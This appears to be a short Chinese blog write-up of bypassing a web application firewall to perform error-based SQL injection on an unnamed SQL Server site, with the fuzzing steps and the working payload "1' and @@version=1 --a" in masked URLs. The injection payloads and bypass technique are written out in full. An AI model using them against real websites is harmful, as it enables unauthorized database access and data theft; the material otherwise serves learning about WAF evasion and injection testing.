一个非常简单的WAF绕过。。

0x00 前言


确实是非常简单,如果是新手的话,我希望能给你带来一些思路,老鸟的话就emm...

0x01 起因


工具扫到了一个有sqlserver特性的站点
一个非常简单的WAF绕过。。
通常出现这种错误信息,说明该站点配置不当,错误信息会直接显示,也没用强制类型转换的信息,那么一般就有报错型注入了!来检测一下
一个非常简单的WAF绕过。。
却出现了WAF的信息

0x02 fuzz


遇到WAF首先得先看看是什么关键字触发了拦截请求,所以我们先进行简单的调试

http://xxxx/xxxx.aspx?xxxx=1' and --a

一个非常简单的WAF绕过。。
语法出错是很正常的,因为我们添加了and且后面没任何值,所以我们可以假设语句变成了

select xxx from xxx where xxxx=1' and --a

但我们发现其实并没有触发WAF,说明and关键字并没有在过滤的列表当中,继续尝试

http://xxxx/xxxx.aspx?xxxx=1' and 1=1 --a

一个非常简单的WAF绕过。。
竟然触发了WAF,经过多次调试,发现是and后面居然不能带数字。。这样就不会报错了

http://xxxx/xxxx.aspx?xxxx=1' and a=1 --a

一个非常简单的WAF绕过。。
那么再次尝试下原来的代码,将顺序调整,成功!

http://xxxx/xxxx.aspx?xxxx=1' and @@version=1 --a

一个非常简单的WAF绕过。。

一个非常简单的WAF绕过。。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章